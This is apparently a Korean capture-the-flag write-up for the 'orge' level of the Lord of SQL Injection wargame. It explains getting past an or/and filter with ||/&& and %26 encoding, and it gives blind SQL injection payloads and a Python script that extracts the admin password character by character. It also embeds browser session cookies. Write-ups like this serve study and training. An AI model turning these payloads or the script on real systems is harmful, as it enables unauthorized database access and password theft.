
los 7번

by sonysame 2018. 6. 28.
query : {$query}

"; $result = @mysql_fetch_array(mysql_query($query)); if($result['id']) echo "

Hello {$result[id]}

"; $_GET[pw] = addslashes($_GET[pw]); $query = "select pw from prob_orge where id='admin' and pw='{$_GET[pw]}'"; $result = @mysql_fetch_array(mysql_query($query)); if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("orge"); highlight_file(__FILE__); ?>


이 문제에서는 pw 파라미터의 or과 and가 필터링되어 그대로는 쓸 수 없으므로 우회해야 한다.

같은 의미의 연산자인 ||와 &&을 대신 쓰면 되는데,

&은 URL 쿼리스트링에서 파라미터 구분자이므로, 그대로 보내면 pw 값이 & 앞에서 잘린다. 반드시 %26으로 URL 인코딩해서 보내자!


두 번째 쿼리는 addslashes()로 따옴표가 이스케이프되고, 조회된 pw가 입력값과 같아야(`$result['pw'] == $_GET['pw']`) solve되므로 인젝션으로는 통과할 수 없다. 따라서 admin의 실제 패스워드를 알아내야 하며, 첫 번째 쿼리의 결과로 "Hello admin"이 출력되는지 여부를 1비트 오라클로 삼아 Blind SQL injection으로 한 글자씩 알아낸다!


?pw=1' || id='admin'%26%26length(pw)>5 --%20

?pw=1' || id='admin'%26%26substr(pw,1,1)>char(50) --%20

substr(pw,n,1)>char(x)가 참이면 "Hello admin"이 출력된다. x를 하나씩 올려 가며 처음으로 거짓이 되는 x가 n번째 글자의 코드다. (참고: MySQL 문자열 비교는 컬럼의 collation을 따르므로 대소문자를 구분하지 못할 수 있다. 최종 == 비교가 실패하면 BINARY나 ord()로 다시 확인하자.)


import requests
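def main(*, position: int = 8, lowest: int = 31, highest: int = 126) -> None:
    """Recover one character of admin's password from the LOS "orge" page.

    The page greets "Hello admin" only when the injected WHERE clause of the
    first query matched a row, so each request is a one-bit oracle.  The
    probe is ``substr(pw, position, 1) > char(x)``: it is true for every x
    below the character's code and turns false exactly when x reaches it,
    so the first x for which the oracle is false is the character.  ``or``
    and ``and`` are filtered by the challenge, hence ``||``/``&&``; ``&`` is
    sent as ``%26`` so the query-string parser does not split the parameter.

    Args:
        position: 1-based index into the password (MySQL ``substr``).
        lowest: first character code to probe.
        highest: last character code to probe.  This bound is what keeps an
            expired session or a changed page from spinning forever -- the
            original loop had no upper limit and never terminated when the
            greeting was absent from every response.

    Raises:
        RuntimeError: the session is not accepted by the page, or no code in
            ``[lowest, highest]`` satisfied the oracle.
    """
    # NOTE(review): real session identifiers copied from a browser.  They are
    # long expired, but live cookies must never be committed or published;
    # load them from the environment or a local config file instead.
    cookie = {
        "__cfduid": "d282347679afbe7ce118657ef96dd67f61530072154",
        "PHPSESSID": "25bfqp0uqr6pmep83spki2t522",
    }
    base_url = "https://los.eagle-jump.org/orge_40d2b61f694f72448be9c97d1cea2480.php"

    # Fail fast if the cookie is rejected: without a valid session no response
    # carries the greeting, so the oracle would read "false" on the very first
    # probe and report a bogus character instead of an error.
    baseline = _fetch(base_url + "?pw=1' || id='admin' --%20", cookie)
    if not _oracle_true(baseline):
        raise RuntimeError("baseline probe did not return 'Hello admin'; "
                           "is the session cookie still valid?")

    for code in range(lowest, highest + 1):
        # Hand-encoded on purpose: %26 keeps '&&' inside the pw parameter and
        # %20 gives the '-- ' comment its required trailing space.
        payload = "?pw=1' || id='admin'%26%26substr(pw,{0},1)>char({1}) --%20".format(
            position, code)
        # NOTE(review): '>' follows the pw column's collation; if that collation
        # is case-insensitive the recovered letter may differ in case from the
        # stored one and the page's final '==' check could still reject it --
        # not verified here.
        if not _oracle_true(_fetch(base_url + payload, cookie)):
            # First code for which pw[position] > char(code) is false, so
            # pw[position] == char(code).
            print("GOOD : " + str(code))
            return
        print(code)

    raise RuntimeError("no character found at position {0} in [{1}, {2}]".format(
        position, lowest, highest))


def _fetch(url: str, cookie: dict) -> str:
    """GET *url* with the session *cookie* and return the response body.

    The timeout keeps one stalled connection from hanging the whole
    extraction.
    """
    return requests.get(url, cookies=cookie, timeout=10).text


def _oracle_true(page: str) -> bool:
    """Return True when the injected predicate matched a row.

    "Hello admin" is rendered above the highlighted source only when the
    first query returned the admin row.  The highlighted source itself also
    contains the literal "Hello", which is why the original compared
    ``find("Hello") > 1000``; matching the rendered greeting does not depend
    on that byte offset.
    """
    return "Hello admin" in page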

# Script entry point: run the extraction only when executed directly,
# not when this module is imported.
if __name__ == "__main__":
    main()
